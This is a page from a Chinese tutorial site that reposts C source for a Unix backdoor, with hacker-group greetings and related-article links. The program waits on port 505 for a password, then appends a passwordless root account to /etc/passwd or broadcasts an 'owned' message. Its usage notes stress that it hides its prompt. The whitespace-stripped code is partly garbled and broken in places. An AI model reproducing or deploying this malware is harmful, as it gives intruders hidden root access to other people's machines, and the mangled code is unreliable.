手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >backdoor病毒珍藏绝密源代码
backdoor病毒珍藏绝密源代码
摘要:--=backdoor.c=--/*AripoffasocketstutorialifoundsomewherecauseIdidn'tfe...

--=backdoor.c=--/*

AripoffasocketstutorialifoundsomewherecauseIdidn'tfeellike

writingstupidbasicsocketscodewhenIhaditinmysrcdirectory

already.

*/

/*Greets:

UndernetChannels:

#rootworm,#hacktech,#hyperlink,#3xposure,#legionoot

Groups:

TheLegionOOT(www.legionoot.cc),TeamSploit

People:

Cyph3r,n3m0,Adoni,f0bic,d0g,khe0ps,h-S-t,

F-o-X,NeonMatrix,Azmodan,&Venomous

/*

Usage(setup):

#gcc-obackdoorbackdoor.c

#./backdoorpassword&

Usage(using):

telnettohost(port505)-->typethepassword(don'twaitfora

prompt,thereisn'tonesoitslessobviousitsabackdoor)-->

type1or2.Andyesit's_supposed_todisconnectyouafter

eachcommand.

*/

#include

#include

#include

#include

#include

#include

#include

#include

#definePORT505

#defineMAXDATASIZE100

#defineBACKLOG10

voidhandle(char*command);

intmain(intargc,char*argv[])

{

intsockfd,new_fd,sin_size,numbytes;

char*bytes;

structsockaddr_inmy_addr;

structsockaddr_intheir_addr;

charbuf[MAXDATASIZE];

charask[]="EnterCommand(1toputr00t::0:0:...in/etc/passwd,2to

send'7h1sb0x1s0wn3d'toallpeopleonthebox:";

if(argc!=2){

fprintf(stderr,"Usage:%spasswordn",argv[0]);

exit(1);

}

if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1){

perror("socket");

exit(1);

}

my_addr.sin_family=AF_INET;

my_addr.sin_port=htons(PORT);

my_addr.sin_addr.s_addr=INADDR_ANY;

if(bind(sockfd,(structsockaddr*)&my_addr,sizeof(structsockaddr))==-1)

{

perror("bind");

exit(1);

}

if(listen(sockfd,BACKLOG)==-1){

perror("listen");

exit(1);

}

while(1){/*mainaccept()loop*/

sin_size=sizeof(structsockaddr_in);

if((new_fd=accept(sockfd,(structsockaddr*)&their_addr,

&sin_size))==

{

perror("accept");

continue;

}

inet_ntoa(their_addr.sin_addr);

if(!fork()){

recv(new_fd,buf,

MAXDATASIZE,0);

bytes=strstr(buf,argv[1]);

if(bytes!=NULL){

send(new_fd,ask,sizeof(ask),0);

numbytes=recv(new_fd,buf,

MAXDATASIZE,0);

buf[numbytes]='';

handle(buf);

}

close(new_fd);

exit(0);

}

close(new_fd);

while(waitpid(-1,NULL,WNOHANG)>0);/*cleanupchild

processes*/

}

}

voidhandle(char*command)

{

FILE*fle;

if(strstr(command,"1")!=NULL)

{

fle=f0/*n("/etc/passwd","a*/;

fprintf(fle,"r00t::0:0:r00t:/root:/bin/bash");

fclose(fle);

}

if(strstr(command,"2")!=NULL)

{

system("wall7h1sb0x1s0wn3d");

}

}

PBBSER

pbbser@legionoot.hypermart.net

----------------------------

【backdoor病毒珍藏绝密源代码】相关文章:

养在深闺人未识:FU_Rootkit

fckeditor的漏洞详细篇

JSP中的源代码泄漏问题

对Serv-U 6.0.0.2默认帐户及密码的一点理解

Access的跨库查询 (图)

蜜罐技术:消除防火墙局限和脆弱

用漏洞提升计算机控制权限(图)

木马静态变动态 DLL木马程序大揭秘

webshell权限提升技巧

浅谈SQL SERVER数据库口令的脆弱性

精品推荐
分类导航